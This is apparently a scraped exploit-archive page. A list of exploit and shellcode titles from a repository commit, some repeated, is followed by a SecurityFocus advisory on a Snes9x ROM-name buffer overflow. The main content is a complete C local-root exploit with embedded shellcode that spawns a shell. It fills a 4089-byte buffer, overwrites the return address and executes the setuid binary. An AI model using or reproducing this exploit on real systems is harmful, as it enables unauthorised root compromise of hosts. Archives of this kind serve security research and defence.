
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
58 lines
No EOL
1.8 KiB
C
58 lines
No EOL
1.8 KiB
C
// source: https://www.securityfocus.com/bid/3437/info
|
|
|
|
Snes9x is a free Super Nintendo emulator that runs on a number of platforms.
|
|
|
|
Snes9x is prone to a buffer overflow. This is due to improper bounds checking of rom names. In this case, 4089 characters are required to overwrite the EIP. If this buffer is overrun, it may be possible for a local attacker to execute arbitrary code on the host. This may be a security concern on some systems because Snes9x documentation suggests setting the utilities setuid root.
|
|
|
|
Successful exploitation will lead to a full compromise of the host.
|
|
|
|
It should be noted that packages distributed in SuSE Linux, NetBSD, OpenBSD, FreeBSD, Debian Linux and Progeny Linux are not installed setuid root by default so exploitation of the buffer overflow will not lead to a root compromise on these systems.
|
|
|
|
/*
|
|
* snes9x local root exploit
|
|
*
|
|
* Tested on snes9x 1.3.7 + Redhat Linux 6.1
|
|
* 2001/10/16 Creation morinosato
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
|
|
#define BUFSIZE 4089
|
|
|
|
char shellcode[]=
|
|
"\xeb\x29\x5e\x29\xc9\x89\xf3\x89\x5e\x08"
|
|
"\xb1\x07\x80\x03\x20\x43\xe0\xfa\x29\xc0"
|
|
"\x88\x46\x07\x89\x46\x0c\xb0\x0b\x87\xf3"
|
|
"\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29\xc0"
|
|
"\x40\xcd\x80\xe8\xd2\xff\xff\xff\x0f\x42"
|
|
"\x49\x4e\x0f\x53\x48";
|
|
|
|
main(int argc, char **argv)
|
|
{
|
|
char buf[BUFSIZE + 1];
|
|
char writeaddr[8];
|
|
char *arg[] = {"./snes9x",buf,0};
|
|
int i;
|
|
unsigned int addr;
|
|
|
|
addr = (0xc0000000 - 4)
|
|
- (sizeof("./snes9x"))
|
|
- (sizeof(buf));
|
|
|
|
*(unsigned int *)&writeaddr[0] = addr;
|
|
memset(buf, 'A', BUFSIZE);
|
|
|
|
for (i = 0; i < strlen(shellcode); i++)
|
|
buf[i] = shellcode[i];
|
|
|
|
buf[83] = writeaddr[0];
|
|
buf[84] = writeaddr[1];
|
|
buf[85] = writeaddr[2];
|
|
buf[86] = writeaddr[3];
|
|
|
|
buf[BUFSIZE] = 0;
|
|
|
|
printf("jmp to [0x%08x]\n",writeaddr);
|
|
execve(arg[0], arg, 0);
|
|
} |